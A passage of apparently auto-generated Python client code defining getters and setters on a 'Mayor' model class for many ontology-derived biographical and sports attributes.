"""
return self._political_function
@political_function.setter
def political_function(self, political_function):
"""Sets the political_function of this Mayor.
Description not available # noqa: E501
:param political_function: The political_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._political_function = political_function
@property
def honours(self):
"""Gets the honours of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The honours of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._honours
@honours.setter
def honours(self, honours):
"""Sets the honours of this Mayor.
Description not available # noqa: E501
:param honours: The honours of this Mayor. # noqa: E501
:type: list[object]
"""
self._honours = honours
@property
def olympic_games(self):
"""Gets the olympic_games of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._olympic_games
@olympic_games.setter
def olympic_games(self, olympic_games):
"""Sets the olympic_games of this Mayor.
Description not available # noqa: E501
:param olympic_games: The olympic_games of this Mayor. # noqa: E501
:type: list[object]
"""
self._olympic_games = olympic_games
@property
def hair_color(self):
"""Gets the hair_color of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hair_color of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._hair_color
@hair_color.setter
def hair_color(self, hair_color):
"""Sets the hair_color of this Mayor.
Description not available # noqa: E501
:param hair_color: The hair_color of this Mayor. # noqa: E501
:type: list[object]
"""
self._hair_color = hair_color
@property
def foot(self):
"""Gets the foot of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The foot of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._foot
@foot.setter
def foot(self, foot):
"""Sets the foot of this Mayor.
Description not available # noqa: E501
:param foot: The foot of this Mayor. # noqa: E501
:type: list[str]
"""
self._foot = foot
@property
def measurements(self):
"""Gets the measurements of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The measurements of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._measurements
@measurements.setter
def measurements(self, measurements):
"""Sets the measurements of this Mayor.
Description not available # noqa: E501
:param measurements: The measurements of this Mayor. # noqa: E501
:type: list[str]
"""
self._measurements = measurements
@property
def hand(self):
"""Gets the hand of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hand of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._hand
@hand.setter
def hand(self, hand):
"""Sets the hand of this Mayor.
Description not available # noqa: E501
:param hand: The hand of this Mayor. # noqa: E501
:type: list[object]
"""
self._hand = hand
@property
def federation(self):
"""Gets the federation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The federation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._federation
@federation.setter
def federation(self, federation):
"""Sets the federation of this Mayor.
Description not available # noqa: E501
:param federation: The federation of this Mayor. # noqa: E501
:type: list[object]
"""
self._federation = federation
@property
def circumcised(self):
"""Gets the circumcised of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The circumcised of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._circumcised
@circumcised.setter
def circumcised(self, circumcised):
"""Sets the circumcised of this Mayor.
Description not available # noqa: E501
:param circumcised: The circumcised of this Mayor. # noqa: E501
:type: list[str]
"""
self._circumcised = circumcised
@property
def penis_length(self):
"""Gets the penis_length of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The penis_length of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._penis_length
@penis_length.setter
def penis_length(self, penis_length):
"""Sets the penis_length of this Mayor.
Description not available # noqa: E501
:param penis_length: The penis_length of this Mayor. # noqa: E501
:type: list[str]
"""
self._penis_length = penis_length
@property
def coemperor(self):
"""Gets the coemperor of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The coemperor of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._coemperor
@coemperor.setter
def coemperor(self, coemperor):
"""Sets the coemperor of this Mayor.
Description not available # noqa: E501
:param coemperor: The coemperor of this Mayor. # noqa: E501
:type: list[object]
"""
self._coemperor = coemperor
@property
def detractor(self):
"""Gets the detractor of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The detractor of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._detractor
@detractor.setter
def detractor(self, detractor):
"""Sets the detractor of this Mayor.
Description not available # noqa: E501
:param detractor: The detractor of this Mayor. # noqa: E501
:type: list[object]
"""
self._detractor = detractor
@property
def selibr_id(self):
"""Gets the selibr_id of this Mayor. # noqa: E501
Authority data from the National Library of Sweden # noqa: E501
:return: The selibr_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._selibr_id
@selibr_id.setter
def selibr_id(self, selibr_id):
"""Sets the selibr_id of this Mayor.
Authority data from the National Library of Sweden # noqa: E501
:param selibr_id: The selibr_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._selibr_id = selibr_id
@property
def danse_competition(self):
"""Gets the danse_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The danse_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._danse_competition
@danse_competition.setter
def danse_competition(self, danse_competition):
"""Sets the danse_competition of this Mayor.
Description not available # noqa: E501
:param danse_competition: The danse_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._danse_competition = danse_competition
@property
def sex(self):
"""Gets the sex of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sex of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sex
@sex.setter
def sex(self, sex):
"""Sets the sex of this Mayor.
Description not available # noqa: E501
:param sex: The sex of this Mayor. # noqa: E501
:type: list[str]
"""
self._sex = sex
@property
def sexual_orientation(self):
"""Gets the sexual_orientation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sexual_orientation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sexual_orientation
@sexual_orientation.setter
def sexual_orientation(self, sexual_orientation):
"""Sets the sexual_orientation of this Mayor.
Description not available # noqa: E501
:param sexual_orientation: The sexual_orientation of this Mayor. # noqa: E501
:type: list[object]
"""
self._sexual_orientation = sexual_orientation
@property
def partner(self):
"""Gets the partner of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The partner of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._partner
@partner.setter
def partner(self, partner):
"""Sets the partner of this Mayor.
Description not available # noqa: E501
:param partner: The partner of this Mayor. # noqa: E501
:type: list[object]
"""
self._partner = partner
@property
def birth_year(self):
"""Gets the birth_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_year
@birth_year.setter
def birth_year(self, birth_year):
"""Sets the birth_year of this Mayor.
Description not available # noqa: E501
:param birth_year: The birth_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_year = birth_year
@property
def sports_function(self):
"""Gets the sports_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sports_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sports_function
@sports_function.setter
def sports_function(self, sports_function):
"""Sets the sports_function of this Mayor.
Description not available # noqa: E501
:param sports_function: The sports_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._sports_function = sports_function
@property
def orcid_id(self):
"""Gets the orcid_id of this Mayor. # noqa: E501
Authority data on researchers, academics, etc. The ID range has been defined as a subset of the forthcoming ISNI range. # noqa: E501
:return: The orcid_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._orcid_id
@orcid_id.setter
def orcid_id(self, orcid_id):
"""Sets the orcid_id of this Mayor.
Authority data on researchers, academics, etc. The ID range has been defined as a subset of the forthcoming ISNI range. # noqa: E501
:param orcid_id: The orcid_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._orcid_id = orcid_id
@property
def election_date(self):
"""Gets the election_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The election_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._election_date
@election_date.setter
def election_date(self, election_date):
"""Sets the election_date of this Mayor.
Description not available # noqa: E501
:param election_date: The election_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._election_date = election_date
@property
def sport_discipline(self):
"""Gets the sport_discipline of this Mayor. # noqa: E501
the sport discipline the athlete practices, e.g. Diving, or that a board member of a sporting club is focussing at # noqa: E501
:return: The sport_discipline of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sport_discipline
@sport_discipline.setter
def sport_discipline(self, sport_discipline):
"""Sets the sport_discipline of this Mayor.
the sport discipline the athlete practices, e.g. Diving, or that a board member of a sporting club is focussing at # noqa: E501
:param sport_discipline: The sport_discipline of this Mayor. # noqa: E501
:type: list[object]
"""
self._sport_discipline = sport_discipline
@property
def collaboration(self):
"""Gets the collaboration of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The collaboration of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._collaboration
@collaboration.setter
def collaboration(self, collaboration):
"""Sets the collaboration of this Mayor.
Description not available # noqa: E501
:param collaboration: The collaboration of this Mayor. # noqa: E501
:type: list[object]
"""
self._collaboration = collaboration
@property
def national_team_year(self):
"""Gets the national_team_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_team_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._national_team_year
@national_team_year.setter
def national_team_year(self, national_team_year):
"""Sets the national_team_year of this Mayor.
Description not available # noqa: E501
:param national_team_year: The national_team_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._national_team_year = national_team_year
@property
def number_of_run(self):
"""Gets the number_of_run of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The number_of_run of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._number_of_run
@number_of_run.setter
def number_of_run(self, number_of_run):
"""Sets the number_of_run of this Mayor.
Description not available # noqa: E501
:param number_of_run: The number_of_run of this Mayor. # noqa: E501
:type: list[int]
"""
self._number_of_run = number_of_run
@property
def spouse_name(self):
"""Gets the spouse_name of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The spouse_name of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._spouse_name
@spouse_name.setter
def spouse_name(self, spouse_name):
"""Sets the spouse_name of this Mayor.
Description not available # noqa: E501
:param spouse_name: The spouse_name of this Mayor. # noqa: E501
:type: list[str]
"""
self._spouse_name = spouse_name
@property
def lah_hof(self):
"""Gets the lah_hof of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The lah_hof of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._lah_hof
@lah_hof.setter
def lah_hof(self, lah_hof):
"""Sets the lah_hof of this Mayor.
Description not available # noqa: E501
:param lah_hof: The lah_hof of this Mayor. # noqa: E501
:type: list[str]
"""
self._lah_hof = lah_hof
@property
def derived_word(self):
"""Gets the derived_word of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The derived_word of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._derived_word
@derived_word.setter
def derived_word(self, derived_word):
"""Sets the derived_word of this Mayor.
Description not available # noqa: E501
:param derived_word: The derived_word of this Mayor. # noqa: E501
:type: list[str]
"""
self._derived_word = derived_word
@property
def current_team_manager(self):
"""Gets the current_team_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The current_team_manager of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._current_team_manager
@current_team_manager.setter
def current_team_manager(self, current_team_manager):
"""Sets the current_team_manager of this Mayor.
Description not available # noqa: E501
:param current_team_manager: The current_team_manager of this Mayor. # noqa: E501
:type: list[object]
"""
self._current_team_manager = current_team_manager
@property
def little_pool_record(self):
"""Gets the little_pool_record of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The little_pool_record of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._little_pool_record
@little_pool_record.setter
def little_pool_record(self, little_pool_record):
"""Sets the little_pool_record of this Mayor.
Description not available # noqa: E501
:param little_pool_record: The little_pool_record of this Mayor. # noqa: E501
:type: list[str]
"""
self._little_pool_record = little_pool_record
@property
def bpn_id(self):
"""Gets the bpn_id of this Mayor. # noqa: E501
Dutch project with material for 40,000 digitized biographies, including former colonies of the Netherlands. # noqa: E501
:return: The bpn_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._bpn_id
@bpn_id.setter
def bpn_id(self, bpn_id):
"""Sets the bpn_id of this Mayor.
Dutch project with material for 40,000 digitized biographies, including former colonies of the Netherlands. # noqa: E501
:param bpn_id: The bpn_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._bpn_id = bpn_id
@property
def free_danse_score(self):
"""Gets the free_danse_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The free_danse_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._free_danse_score
@free_danse_score.setter
def free_danse_score(self, free_danse_score):
"""Sets the free_danse_score of this Mayor.
Description not available # noqa: E501
:param free_danse_score: The free_danse_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._free_danse_score = free_danse_score
@property
def project(self):
"""Gets the project of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The project of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._project
@project.setter
def project(self, project):
"""Sets the project of this Mayor.
Description not available # noqa: E501
:param project: The project of this Mayor. # noqa: E501
:type: list[object]
"""
self._project = project
@property
def active_years(self):
"""Gets the active_years of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._active_years
@active_years.setter
def active_years(self, active_years):
"""Sets the active_years of this Mayor.
Description not available # noqa: E501
:param active_years: The active_years of this Mayor. # noqa: E501
:type: list[object]
"""
self._active_years = active_years
@property
def title_date(self):
"""Gets the title_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The title_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._title_date
@title_date.setter
def title_date(self, title_date):
"""Sets the title_date of this Mayor.
Description not available # noqa: E501
:param title_date: The title_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._title_date = title_date
@property
def blood_group(self):
"""Gets the blood_group of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The blood_group of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._blood_group
@blood_group.setter
def blood_group(self, blood_group):
"""Sets the blood_group of this Mayor.
Description not available # noqa: E501
:param blood_group: The blood_group of this Mayor. # noqa: E501
:type: list[str]
"""
self._blood_group = blood_group
@property
def school(self):
"""Gets the school of this Mayor. # noqa: E501
school a person goes or went to # noqa: E501
:return: The school of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._school
@school.setter
def school(self, school):
"""Sets the school of this Mayor.
school a person goes or went to # noqa: E501
:param school: The school of this Mayor. # noqa: E501
:type: list[object]
"""
self._school = school
@property
def death_place(self):
"""Gets the death_place of this Mayor. # noqa: E501
the place where they died # noqa: E501
:return: The death_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._death_place
@death_place.setter
def death_place(self, death_place):
"""Sets the death_place of this Mayor.
the place where they died # noqa: E501
:param death_place: The death_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._death_place = death_place
@property
def victory_percentage_as_mgr(self):
"""Gets the victory_percentage_as_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The victory_percentage_as_mgr of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._victory_percentage_as_mgr
@victory_percentage_as_mgr.setter
def victory_percentage_as_mgr(self, victory_percentage_as_mgr):
"""Sets the victory_percentage_as_mgr of this Mayor.
Description not available # noqa: E501
:param victory_percentage_as_mgr: The victory_percentage_as_mgr of this Mayor. # noqa: E501
:type: list[float]
"""
self._victory_percentage_as_mgr = victory_percentage_as_mgr
@property
def imposed_danse_competition(self):
"""Gets the imposed_danse_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The imposed_danse_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._imposed_danse_competition
@imposed_danse_competition.setter
def imposed_danse_competition(self, imposed_danse_competition):
"""Sets the imposed_danse_competition of this Mayor.
Description not available # noqa: E501
:param imposed_danse_competition: The imposed_danse_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._imposed_danse_competition = imposed_danse_competition
@property
def shoot(self):
"""Gets the shoot of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The shoot of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._shoot
@shoot.setter
def shoot(self, shoot):
"""Sets the shoot of this Mayor.
Description not available # noqa: E501
:param shoot: The shoot of this Mayor. # noqa: E501
:type: list[str]
"""
self._shoot = shoot
@property
def education_place(self):
"""Gets the education_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The education_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._education_place
@education_place.setter
def education_place(self, education_place):
"""Sets the education_place of this Mayor.
Description not available # noqa: E501
:param education_place: The education_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._education_place = education_place
@property
def match_point(self):
"""Gets the match_point of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The match_point of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._match_point
@match_point.setter
def match_point(self, match_point):
"""Sets the match_point of this Mayor.
Description not available # noqa: E501
:param match_point: The match_point of this Mayor. # noqa: E501
:type: list[str]
"""
self._match_point = match_point
@property
def reign_name(self):
"""Gets the reign_name of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The reign_name of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._reign_name
@reign_name.setter
def reign_name(self, reign_name):
"""Sets the reign_name of this Mayor.
Description not available # noqa: E501
:param reign_name: The reign_name of this Mayor. # noqa: E501
:type: list[str]
"""
self._reign_name = reign_name
@property
def pro_period(self):
"""Gets the pro_period of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pro_period of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._pro_period
@pro_period.setter
def pro_period(self, pro_period):
"""Sets the pro_period of this Mayor.
Description not available # noqa: E501
:param pro_period: The pro_period of this Mayor. # noqa: E501
:type: list[str]
"""
self._pro_period = pro_period
@property
def influenced_by(self):
"""Gets the influenced_by of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The influenced_by of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._influenced_by
@influenced_by.setter
def influenced_by(self, influenced_by):
"""Sets the influenced_by of this Mayor.
Description not available # noqa: E501
:param influenced_by: The influenced_by of this Mayor. # noqa: E501
:type: list[object]
"""
self._influenced_by = influenced_by
@property
def nla_id(self):
"""Gets the nla_id of this Mayor. # noqa: E501
NLA Trove’s People and Organisation view allows the discovery of biographical and other contextual information about people and organisations. Search also available via VIAF. # noqa: E501
:return: The nla_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._nla_id
@nla_id.setter
def nla_id(self, nla_id):
"""Sets the nla_id of this Mayor.
NLA Trove’s People and Organisation view allows the discovery of biographical and other contextual information about people and organisations. Search also available via VIAF. # noqa: E501
:param nla_id: The nla_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._nla_id = nla_id
@property
def cousurper(self):
"""Gets the cousurper of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The cousurper of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._cousurper
@cousurper.setter
def cousurper(self, cousurper):
"""Sets the cousurper of this Mayor.
Description not available # noqa: E501
:param cousurper: The cousurper of this Mayor. # noqa: E501
:type: list[object]
"""
self._cousurper = cousurper
@property
def race_wins(self):
"""Gets the race_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The race_wins of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._race_wins
@race_wins.setter
def race_wins(self, race_wins):
"""Sets the race_wins of this Mayor.
Description not available # noqa: E501
:param race_wins: The race_wins of this Mayor. # noqa: E501
:type: list[int]
"""
self._race_wins = race_wins
@property
def world_tournament_bronze(self):
"""Gets the world_tournament_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world_tournament_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._world_tournament_bronze
@world_tournament_bronze.setter
def world_tournament_bronze(self, world_tournament_bronze):
"""Sets the world_tournament_bronze of this Mayor.
Description not available # noqa: E501
:param world_tournament_bronze: The world_tournament_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._world_tournament_bronze = world_tournament_bronze
@property
def jutsu(self):
"""Gets the jutsu of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The jutsu of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._jutsu
@jutsu.setter
def jutsu(self, jutsu):
"""Sets the jutsu of this Mayor.
Description not available # noqa: E501
:param jutsu: The jutsu of this Mayor. # noqa: E501
:type: list[str]
"""
self._jutsu = jutsu
@property
def weight(self):
"""Gets the weight of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The weight of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._weight
@weight.setter
def weight(self, weight):
"""Sets the weight of this Mayor.
Description not available # noqa: E501
:param weight: The weight of this Mayor. # noqa: E501
:type: list[object]
"""
self._weight = weight
@property
def other_media(self):
"""Gets the other_media of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The other_media of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._other_media
@other_media.setter
def other_media(self, other_media):
"""Sets the other_media of this Mayor.
Description not available # noqa: E501
:param other_media: The other_media of this Mayor. # noqa: E501
:type: list[object]
"""
self._other_media = other_media
@property
def alma_mater(self):
"""Gets the alma_mater of this Mayor. # noqa: E501
schools that they attended # noqa: E501
:return: The alma_mater of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._alma_mater
@alma_mater.setter
def alma_mater(self, alma_mater):
"""Sets the alma_mater of this Mayor.
schools that they attended # noqa: E501
:param alma_mater: The alma_mater of this Mayor. # noqa: E501
:type: list[object]
"""
self._alma_mater = alma_mater
@property
def imposed_danse_score(self):
"""Gets the imposed_danse_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The imposed_danse_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._imposed_danse_score
@imposed_danse_score.setter
def imposed_danse_score(self, imposed_danse_score):
"""Sets the imposed_danse_score of this Mayor.
Description not available # noqa: E501
:param imposed_danse_score: The imposed_danse_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._imposed_danse_score = imposed_danse_score
@property
def known_for(self):
"""Gets the known_for of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The known_for of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._known_for
@known_for.setter
def known_for(self, known_for):
"""Sets the known_for of this Mayor.
Description not available # noqa: E501
:param known_for: The known_for of this Mayor. # noqa: E501
:type: list[object]
"""
self._known_for = known_for
@property
def big_pool_record(self):
"""Gets the big_pool_record of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The big_pool_record of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._big_pool_record
@big_pool_record.setter
def big_pool_record(self, big_pool_record):
"""Sets the big_pool_record of this Mayor.
Description not available # noqa: E501
:param big_pool_record: The big_pool_record of this Mayor. # noqa: E501
:type: list[str]
"""
self._big_pool_record = big_pool_record
@property
def olympic_games_wins(self):
"""Gets the olympic_games_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_wins of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._olympic_games_wins
@olympic_games_wins.setter
def olympic_games_wins(self, olympic_games_wins):
"""Sets the olympic_games_wins of this Mayor.
Description not available # noqa: E501
:param olympic_games_wins: The olympic_games_wins of this Mayor. # noqa: E501
:type: list[str]
"""
self._olympic_games_wins = olympic_games_wins
@property
def eye_colour(self):
"""Gets the eye_colour of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The eye_colour of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._eye_colour
@eye_colour.setter
def eye_colour(self, eye_colour):
"""Sets the eye_colour of this Mayor.
Description not available # noqa: E501
:param eye_colour: The eye_colour of this Mayor. # noqa: E501
:type: list[str]
"""
self._eye_colour = eye_colour
@property
def world_tournament_silver(self):
"""Gets the world_tournament_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world_tournament_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._world_tournament_silver
@world_tournament_silver.setter
def world_tournament_silver(self, world_tournament_silver):
"""Sets the world_tournament_silver of this Mayor.
Description not available # noqa: E501
:param world_tournament_silver: The world_tournament_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._world_tournament_silver = world_tournament_silver
@property
def architectural_movement(self):
"""Gets the architectural_movement of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The architectural_movement of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._architectural_movement
@architectural_movement.setter
def architectural_movement(self, architectural_movement):
"""Sets the architectural_movement of this Mayor.
Description not available # noqa: E501
:param architectural_movement: The architectural_movement of this Mayor. # noqa: E501
:type: list[str]
"""
self._architectural_movement = architectural_movement
@property
def mood(self):
"""Gets the mood of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The mood of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._mood
@mood.setter
def mood(self, mood):
"""Sets the mood of this Mayor.
Description not available # noqa: E501
:param mood: The mood of this Mayor. # noqa: E501
:type: list[str]
"""
self._mood = mood
@property
def bibsys_id(self):
"""Gets the bibsys_id of this Mayor. # noqa: E501
BIBSYS is a supplier of library and information systems for all Norwegian university Libraries, the National Library of Norway, college libraries, and a number of research libraries and institutions. # noqa: E501
:return: The bibsys_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._bibsys_id
@bibsys_id.setter
def bibsys_id(self, bibsys_id):
"""Sets the bibsys_id of this Mayor.
BIBSYS is a supplier of library and information systems for all Norwegian university Libraries, the National Library of Norway, college libraries, and a number of research libraries and institutions. # noqa: E501
:param bibsys_id: The bibsys_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._bibsys_id = bibsys_id
@property
def iihf_hof(self):
"""Gets the iihf_hof of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The iihf_hof of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._iihf_hof
@iihf_hof.setter
def iihf_hof(self, iihf_hof):
"""Sets the iihf_hof of this Mayor.
Description not available # noqa: E501
:param iihf_hof: The iihf_hof of this Mayor. # noqa: E501
:type: list[str]
"""
self._iihf_hof = iihf_hof
@property
def free_prog_score(self):
"""Gets the free_prog_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The free_prog_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._free_prog_score
@free_prog_score.setter
def free_prog_score(self, free_prog_score):
"""Sets the free_prog_score of this Mayor.
Description not available # noqa: E501
:param free_prog_score: The free_prog_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._free_prog_score = free_prog_score
@property
def description(self):
"""Gets the description of this Mayor. # noqa: E501
small description # noqa: E501
:return: The description of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Mayor.
small description # noqa: E501
:param description: The description of this Mayor. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def particular_sign(self):
"""Gets the particular_sign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The particular_sign of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._particular_sign
@particular_sign.setter
def particular_sign(self, particular_sign):
"""Sets the particular_sign of this Mayor.
Description not available # noqa: E501
:param particular_sign: The particular_sign of this Mayor. # noqa: E501
:type: list[str]
"""
self._particular_sign = particular_sign
@property
def league_manager(self):
"""Gets the league_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The league_manager of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._league_manager
@league_manager.setter
def league_manager(self, league_manager):
"""Sets the league_manager of this Mayor.
Description not available # noqa: E501
:param league_manager: The league_manager of this Mayor. # noqa: E501
:type: list[object]
"""
self._league_manager = league_manager
@property
def junior_season(self):
"""Gets the junior_season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The junior_season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._junior_season
@junior_season.setter
def junior_season(self, junior_season):
"""Sets the junior_season of this Mayor.
Description not available # noqa: E501
:param junior_season: The junior_season of this Mayor. # noqa: E501
:type: list[object]
"""
self._junior_season = junior_season
@property
def free_prog_competition(self):
"""Gets the free_prog_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The free_prog_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._free_prog_competition
@free_prog_competition.setter
def free_prog_competition(self, free_prog_competition):
"""Sets the free_prog_competition of this Mayor.
Description not available # noqa: E501
:param free_prog_competition: The free_prog_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._free_prog_competition = free_prog_competition
@property
def weapon(self):
"""Gets the weapon of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The weapon of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._weapon
@weapon.setter
def weapon(self, weapon):
"""Sets the weapon of this Mayor.
Description not available # noqa: E501
:param weapon: The weapon of this Mayor. # noqa: E501
:type: list[object]
"""
self._weapon = weapon
@property
def kind_of_criminal(self):
"""Gets the kind_of_criminal of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The kind_of_criminal of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._kind_of_criminal
@kind_of_criminal.setter
def kind_of_criminal(self, kind_of_criminal):
"""Sets the kind_of_criminal of this Mayor.
Description not available # noqa: E501
:param kind_of_criminal: The kind_of_criminal of this Mayor. # noqa: E501
:type: list[str]
"""
self._kind_of_criminal = kind_of_criminal
@property
def notable_idea(self):
"""Gets the notable_idea of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The notable_idea of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._notable_idea
@notable_idea.setter
def notable_idea(self, notable_idea):
"""Sets the notable_idea of this Mayor.
